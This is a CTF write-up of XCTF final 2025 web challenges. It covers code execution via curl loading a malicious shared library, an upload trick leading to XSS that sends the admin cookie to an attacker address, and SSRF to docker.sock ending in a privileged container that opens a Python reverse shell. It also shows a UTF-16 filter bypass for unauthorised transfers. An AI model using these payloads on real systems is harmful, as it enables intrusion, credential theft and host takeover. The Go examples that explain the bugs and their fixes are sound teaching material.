
XCTF final 2025 N1Star web wp

Written during the competition, so it is fairly rough.

kidding

Reference article: curl arbitrary library loading to achieve remote code execution (RCE)

Build the shared object as described in that article:

#include <stdlib.h>
#include <stdio.h>

/* Runs as soon as the library is dlopen()ed, before any engine symbol is looked up. */
__attribute__((constructor)) static void rce_init(void)
{
    system("ls / > /tmp/1");
}

gcc -fPIC -shared -o 1.so 1.c

Upload it to /tmp/1.so on the target.

Run the following PHP script:

<?php
// Path of the uploaded shared object; anything OpenSSL can dlopen() will do.
$malicious_so_path = '/tmp/1.so';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://127.0.0.1");
// libcurl asks OpenSSL for an engine with this id; when no built-in engine matches it
// falls back to the "dynamic" engine, which dlopen()s the string as a path, so the
// constructor above runs before any engine validation happens.
curl_setopt($ch, CURLOPT_SSLENGINE, $malicious_so_path);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_exec($ch);
curl_close($ch);

/tmp/1 now holds the root listing, which reveals the flag file name flag_141f80cc2-4400-45f0-9399-4900efb730f5. Rebuild the shared object to read that file:

#include <stdlib.h>
#include <stdio.h>

/* Same constructor trick, this time copying the flag out to a readable path. */
__attribute__((constructor)) static void rce_init(void)
{
    system("cat /flag_141f80cc2-4400-45f0-9399-4900efb730f5 > /tmp/1");
}

Upload it again, re-run the PHP script, and read the flag from /tmp/1.

go-storage

Reproducing this challenge had some flaky behaviour, e.g. after stealing the admin cookie via XSS the admin session still would not log in, and so on.

The Go side calls os.CreateTemp(uploadDir, fileInfo.Filename) with the client-supplied filename as the pattern. If the pattern contains *, CreateTemp substitutes its random string for the last * and keeps whatever follows, so the extension survives. Uploading a file named *.html therefore stores a real .html file under /uploads; have the bot visit it and exfiltrate the admin cookie via XSS.

Submit the URL http://nginx-proxy/uploads/xxx.html (xxx being the random name CreateTemp produced) with this file content:

<html>
  <script>fetch("http://IP:PORT?c="+document.cookie)</script>
</html>
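The CreateTemp behaviour described above, as an added Go example that is not the challenge's source: storeUpload reproduces the vulnerable call, and storeUploadSafe is an assumed fix (extension allow-list plus a fully random stored name). The function names, the allow-list and the sample filenames are my own.

```go
package main

import (
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// storeUpload reproduces the vulnerable call: the client-supplied filename is used
// verbatim as the os.CreateTemp pattern. CreateTemp appends a random string to the
// pattern, or, if the pattern contains '*', substitutes the random string for the
// LAST '*' and keeps everything after it, so "*.html" yields "<random>.html".
func storeUpload(uploadDir, filename string) (string, error) {
	f, err := os.CreateTemp(uploadDir, filename)
	if err != nil {
		return "", err // e.g. "pattern contains path separator" for "../x.html"
	}
	defer f.Close()
	return filepath.Base(f.Name()), nil
}

// storeUploadSafe is an assumed fix, not the challenge's code: the extension must be on
// an allow-list and the stored name is always random, so the uploader controls neither
// the base name nor a server-interpreted suffix such as .html.
func storeUploadSafe(uploadDir, filename string) (string, error) {
	ext := strings.ToLower(filepath.Ext(filename))
	switch ext {
	case ".png", ".jpg", ".jpeg", ".txt":
	default:
		return "", fmt.Errorf("extension %q not allowed", ext)
	}
	f, err := os.CreateTemp(uploadDir, "upload-*"+ext)
	if err != nil {
		return "", err
	}
	defer f.Close()
	return filepath.Base(f.Name()), nil
}

func main() {
	dir, err := os.MkdirTemp("", "uploads")
	if err != nil {
		panic(err)
	}
	defer os.RemoveAll(dir)
	// Constructed sample filenames: a plain name, the '*' trick, a traversal attempt, an allowed type.
	for _, name := range []string{"shell.html", "*.html", "../x.html", "pic.PNG"} {
		got, err := storeUpload(dir, name)
		fmt.Printf("storeUpload(%q) -> %q, %v\n", name, got, err)
		got, err = storeUploadSafe(dir, name)
		fmt.Printf("storeUploadSafe(%q) -> %q, %v\n", name, got, err)
	}
}
```

Note that CreateTemp already rejects path separators in the pattern, so traversal is not the issue here; the problem is purely that the suffix after the last * is attacker-chosen.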

With the admin cookie, the /admin endpoint turns out to be an arbitrary-URL fetch built on superagent.

superagent's Node client also accepts http+unix:// URLs and sends the request to a Unix domain socket, and the container has docker.sock mounted.

Probe the daemon with http+unix://%2Fvar%2Frun%2Fdocker.sock/_ping (the socket path is URL-encoded in the host position).

Then POST to http+unix://%2Fvar%2Frun%2Fdocker.sock/v1.43/containers/storage-service/exec with body:

{
  "AttachStdout": true,
  "AttachStderr": true,
  "Cmd": ["/bin/sh","-lc","cp /flag.txt /app/src/uploads/flag.txt"]
}

The response contains an exec ID.

Then POST to http+unix://%2Fvar%2Frun%2Fdocker.sock/v1.43/exec/<ID>/start with body:

{ "Detach": false, "Tty": false }

The command copies the flag into the upload directory, so fetching /uploads/flag.txt returns it.
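The exec create/start exchange above, as an added Go example that is not the challenge's code. execInContainer sends both requests over the unix socket the way superagent's http+unix:// URL does; because no live dockerd is available offline, fakeDaemon is a constructed stand-in that serves the two endpoints, returns a fixed ID ("deadbeefcafe") and fake output. The socket path, container name and command are taken from the writeup; the fake daemon's responses are mine. Pointed at a real /var/run/docker.sock, the same client would also drive /containers/create for the escape described further down.

```go
package main

import (
	"bytes"
	"context"
	"encoding/json"
	"fmt"
	"io"
	"net"
	"net/http"
	"os"
	"path/filepath"
	"strings"
)

// ExecConfig is the body of POST /v1.43/containers/{name}/exec.
type ExecConfig struct {
	AttachStdout bool     `json:"AttachStdout"`
	AttachStderr bool     `json:"AttachStderr"`
	Cmd          []string `json:"Cmd"`
}

// socketClient dials the unix socket at sockPath regardless of the URL host (what http+unix:// gives superagent).
func socketClient(sockPath string) *http.Client {
	return &http.Client{Transport: &http.Transport{
		DialContext: func(ctx context.Context, _, _ string) (net.Conn, error) {
			return (&net.Dialer{}).DialContext(ctx, "unix", sockPath)
		},
	}}
}

// execInContainer performs the two-step exchange: create an exec instance (expects 201 and
// {"Id":...}), then start it with Detach=false, Tty=false and return the raw output. A real
// daemon multiplexes stdout/stderr into 8-byte-header frames when Tty is false; not stripped here.
func execInContainer(sockPath, container string, cmd []string) (string, []byte, error) {
	c := socketClient(sockPath)
	body, _ := json.Marshal(ExecConfig{AttachStdout: true, AttachStderr: true, Cmd: cmd})
	resp, err := c.Post("http://docker/v1.43/containers/"+container+"/exec", "application/json", bytes.NewReader(body))
	if err != nil {
		return "", nil, err
	}
	defer resp.Body.Close()
	if resp.StatusCode != http.StatusCreated {
		return "", nil, fmt.Errorf("exec create: %s", resp.Status)
	}
	var created struct{ Id string }
	if err := json.NewDecoder(resp.Body).Decode(&created); err != nil {
		return "", nil, err
	}
	resp2, err := c.Post("http://docker/v1.43/exec/"+created.Id+"/start", "application/json", strings.NewReader(`{"Detach":false,"Tty":false}`))
	if err != nil {
		return "", nil, err
	}
	defer resp2.Body.Close()
	out, err := io.ReadAll(resp2.Body)
	return created.Id, out, err
}

// fakeDaemon is a constructed stand-in for dockerd so the exchange runs offline: it serves the
// two endpoints on a unix socket, returns a fixed exec ID and hands the received ExecConfig back.
func fakeDaemon(sockPath string) (<-chan ExecConfig, func(), error) {
	ln, err := net.Listen("unix", sockPath)
	if err != nil {
		return nil, nil, err
	}
	got := make(chan ExecConfig, 4) // buffered so the handler never blocks on a slow reader
	mux := http.NewServeMux()
	mux.HandleFunc("/v1.43/containers/", func(w http.ResponseWriter, r *http.Request) {
		var cfg ExecConfig
		if r.Method != http.MethodPost || !strings.HasSuffix(r.URL.Path, "/exec") || json.NewDecoder(r.Body).Decode(&cfg) != nil {
			http.Error(w, "bad request", http.StatusBadRequest)
			return
		}
		got <- cfg
		w.WriteHeader(http.StatusCreated)
		json.NewEncoder(w).Encode(map[string]string{"Id": "deadbeefcafe"})
	})
	mux.HandleFunc("/v1.43/exec/", func(w http.ResponseWriter, r *http.Request) {
		io.WriteString(w, "fake output\n")
	})
	srv := &http.Server{Handler: mux}
	go srv.Serve(ln)
	return got, func() { srv.Close() }, nil
}

func main() {
	dir, _ := os.MkdirTemp("", "sock")
	defer os.RemoveAll(dir)
	sock := filepath.Join(dir, "docker.sock")
	got, stop, err := fakeDaemon(sock)
	if err != nil {
		panic(err)
	}
	defer stop()
	id, out, err := execInContainer(sock, "storage-service",
		[]string{"/bin/sh", "-lc", "cp /flag.txt /app/src/uploads/flag.txt"})
	fmt.Println(id, string(out), err, (<-got).Cmd)
}
```

The design point is that the client never sees a hostname at all: whoever can make the application open a unix socket effectively holds the docker socket's root-equivalent privileges, which is why docker.sock should not be mounted into a container that fetches user-supplied URLs.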

Testing afterwards showed that with docker.sock mounted a full container escape should also be possible.

POST to http+unix://%2Fvar%2Frun%2Fdocker.sock/v1.43/containers/create with body:

{
  "Image": "chall-go-storage-bot",
  "Cmd": ["/bin/sh", "-c", "export RHOST=\"<HOST>\";export RPORT=<PORT>;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")'"],
  "HostConfig": {
    "Privileged": true,
    "Binds": ["/:/host"]
  }
}

After starting that container you receive a shell with the host's root filesystem mounted at /host; from there, add an SSH key or similar.

I thought of this during the contest but did not try it; presumably there were countermeasures.

wallet

# UTF-16LE byte order mark, then the JSON body re-encoded as UTF-16LE
echo -ne '\xff\xfe' > 1.json
printf '{"from":"admin","to":"aaa","amount":100000}' | iconv -f utf-8 -t utf-16le >> 1.json
# declare the charset so the server decodes the body as UTF-16
curl -s http://173.32.6.116:3000/transfer \
  -H 'Content-Type: application/json; charset=utf-16le' \
  --data-binary @1.json

The UTF-16 body slips past the check that forbids transfers from admin, so first move all of admin's money to yourself.
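Why the UTF-16LE body gets past the filter, as an added Go example that is not the challenge's code. That the server looks for the literal bytes "admin" in the raw body before decoding it is my assumption about the target; encodeUTF16LE builds the same bytes as the echo/iconv pipeline above, vulnerableTransfer models the bypassed check, and safeTransfer checks the parsed field instead. The payload is the one from the writeup.

```go
package main

import (
	"bytes"
	"encoding/json"
	"errors"
	"fmt"
	"strings"
	"unicode/utf16"
)

// Transfer is the JSON body /transfer accepts (field names taken from the payload above).
type Transfer struct {
	From   string  `json:"from"`
	To     string  `json:"to"`
	Amount float64 `json:"amount"`
}

// encodeUTF16LE builds what the echo/iconv pipeline produces: a UTF-16LE BOM (FF FE)
// followed by the text as little-endian 16-bit code units, so every ASCII byte is
// followed by 0x00 on the wire.
func encodeUTF16LE(s string) []byte {
	out := []byte{0xff, 0xfe}
	for _, u := range utf16.Encode([]rune(s)) {
		out = append(out, byte(u), byte(u>>8))
	}
	return out
}

// decodeBody converts a request body to text according to the Content-Type charset.
// Only utf-8 and utf-16le are handled; that the target decodes like this is an assumption.
func decodeBody(body []byte, charset string) (string, error) {
	switch strings.ToLower(charset) {
	case "", "utf-8":
		return string(body), nil
	case "utf-16le":
		body = bytes.TrimPrefix(body, []byte{0xff, 0xfe})
		if len(body)%2 != 0 {
			return "", errors.New("odd-length utf-16le body")
		}
		units := make([]uint16, len(body)/2)
		for i := range units {
			units[i] = uint16(body[2*i]) | uint16(body[2*i+1])<<8
		}
		return string(utf16.Decode(units)), nil
	}
	return "", fmt.Errorf("unsupported charset %q", charset)
}

// vulnerableTransfer models the check the UTF-16 body bypasses (assumed, not the real
// server): it searches the raw bytes for `"admin"` before decoding. In UTF-16LE the
// interleaved 0x00 bytes mean the substring is never found, yet the decoded JSON still
// says from=admin.
func vulnerableTransfer(body []byte, charset string) (Transfer, error) {
	var t Transfer
	if bytes.Contains(body, []byte(`"admin"`)) {
		return t, errors.New("transfers from admin are not allowed")
	}
	text, err := decodeBody(body, charset)
	if err != nil {
		return t, err
	}
	err = json.Unmarshal([]byte(text), &t)
	return t, err
}

// safeTransfer decodes and parses first, then checks the parsed field, so the wire
// encoding cannot hide the sender.
func safeTransfer(body []byte, charset string) (Transfer, error) {
	var t Transfer
	text, err := decodeBody(body, charset)
	if err != nil {
		return t, err
	}
	if err := json.Unmarshal([]byte(text), &t); err != nil {
		return t, err
	}
	if t.From == "admin" {
		return Transfer{}, errors.New("transfers from admin are not allowed")
	}
	return t, nil
}

func main() {
	payload := `{"from":"admin","to":"aaa","amount":100000}` // constructed, same as the writeup's body
	fmt.Println(vulnerableTransfer([]byte(payload), "utf-8"))       // rejected
	fmt.Println(vulnerableTransfer(encodeUTF16LE(payload), "utf-16le")) // accepted with From=admin
	fmt.Println(safeTransfer(encodeUTF16LE(payload), "utf-16le"))       // rejected
}
```

The general lesson is that any policy check must run on the same decoded, parsed value the business logic uses; a check on the raw byte stream is defeated by whatever alternative encodings the parser accepts.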

There is also a floating-point precision problem: create a new account and transfer money back and forth between the two, 50000 at a time.

After a dozen or so transfers the balance reaches 100000.01, which yields the flag.

STM32

__   __ _____  _______  ______            ____    _____  _____
\ \ / // ____||__   __||  ____|          / __ \  / ____||  __ \
 \ V /| |        | |   | |__      \ /   | |  | || (___  | |__) |
  > < | |        | |   |  __|      X    | |  | | \___ \ |  _  /
 / . \| |____    | |   | |        / \   | |__| | ____) || | \ \
/_/ \_\\_____|   |_|   |_|               \____/ |_____/ |_|  \_\

[*] Welcome to XCTF Final 2025 ~
[0] The Attachment at <https://github.com/xuanxuanblingbling/xctf_2025_final_rw_stm32>
[1] Tap Morse code "XCTF" at PC13 (active low) to get the first NFC M1 Card UID!
[2] Use CVE-2020-15808 or Glitch Attack to bypass STM32F103 RDP1, get the second NFC M1 Card UID at 0x0800F000 !

Short PC13 to GND by hand to tap out the Morse code (the pin is active low), then write the returned UID into the UID block of a CUID (UID-writable) card:

01 C8 21 F9 11

License: CC BY 4.0